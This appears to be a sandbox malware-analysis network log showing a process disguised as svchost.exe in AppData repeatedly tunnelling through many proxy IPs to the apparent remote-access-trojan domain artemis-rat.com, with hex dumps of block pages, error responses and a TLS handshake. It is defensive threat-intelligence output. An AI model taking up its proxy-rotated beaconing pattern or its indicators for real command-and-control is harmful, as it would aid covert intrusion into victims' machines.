                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53 61 74 2c 20 30 39 20 4d 61 72 20 32 30 32 34 20 31 32 3a 31 34 3a 33 34 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Sat, 09 Mar 2024 12:14:34 GMT</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3228192.168.2.56038351.81.186.1795140543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.794940948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.380182981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.177644968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.474638939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3229192.168.2.560349114.156.77.107808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.801573992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.087182999 CET1286INHTTP/1.1 403 Forbidden
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Cache-Control: no-cache
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Length: 4872
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2e 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=EDGE"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Roboto&display=swap" rel="stylesheet"> <style type="text/css"> body { height: 100%; font-family: Roboto, Helvetica, Arial, sans-serif; color: #6a6a6a; margin: 0; display: flex; align-items: center; justify-content: center; } input[type=date], input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=time], input[type=url], select, textarea { color: #262626; vertical-align: baseline; margin: .2em; border-style: solid; border-width: 1px; border-color: #a9a9a9; background-color: #fff;


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3230192.168.2.56040854.67.125.45312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.803085089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.977492094 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3231192.168.2.560340109.238.12.156136543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.808737993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.485857010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.474565029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.378470898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3232192.168.2.5603453.127.62.2528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.811075926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.114924908 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:35.138861895 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a9 46 dd 8f de 73 fe 1f 82 b3 8d 13 24 56 ef 72 f6 b7 f7 39 57 aa 57 69 66 6c c7 74 59 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRFs$Vr9WWifltY*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:35.441771984 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 2b 95 0d 83 98 9e 38 76 df 16 7b d0 73 f7 d9 80 a8 f5 f6 3f 04 89 dc b4 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9+8v{s?DOWNGRD0000*H010Uartemis-rat.com0240309120940Z260309120940Z010Uartemis-rat.com0"0*H0A?J*:
                                                                                    Mar 9, 2024 13:14:35.445914984 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 91 c5 2f 97 47 40 ca bf c6 6d 74 93 0c 41 dd ed 8c 1b de 64 48 c8 c7 ec e2 fc 4f 24 31 e9 11 39 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 5e 44 9d 58 0a 8c ae 31 2e f1 59 a3 ca 40 91 b1 e4 48 43 4c 66
                                                                                    Data Ascii: %! /G@mtAdHO$19(^DX1.Y@HCLf_^v
                                                                                    Mar 9, 2024 13:14:35.750632048 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 4c 2f a8 d5 7f e5 fd 67 c8 c5 58 7a 12 89 79 dc 95 7d 4b 57 e1 d4 5c 99 3d 70 7f 4b 7e fe e2 b4 a2 42 0c 79 cd 5b 90 22
                                                                                    Data Ascii: (L/gXzy}KW\=pK~By["


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3233192.168.2.560190102.69.177.2421008143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.821041107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3234192.168.2.560449104.16.226.68043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.822360039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.976660013 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3235192.168.2.560412172.93.213.1778043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.840420961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.057689905 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.22.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3236192.168.2.56053543.152.192.21744343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.843713045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3237192.168.2.56053643.152.192.21744343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.844652891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3238192.168.2.55908651.158.125.1351637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.844813108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.846230030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3239192.168.2.56053743.152.192.21744343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.845405102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3240192.168.2.560331216.9.224.1138043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.846049070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3241192.168.2.56053843.152.192.21744343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.846551895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3242192.168.2.555373207.180.198.2411316843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.849926949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3243192.168.2.560361103.166.141.742007443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.860790014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3244192.168.2.5590308.222.175.2105055443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.875044107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3245192.168.2.560460104.22.37.2368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.892427921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.046681881 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
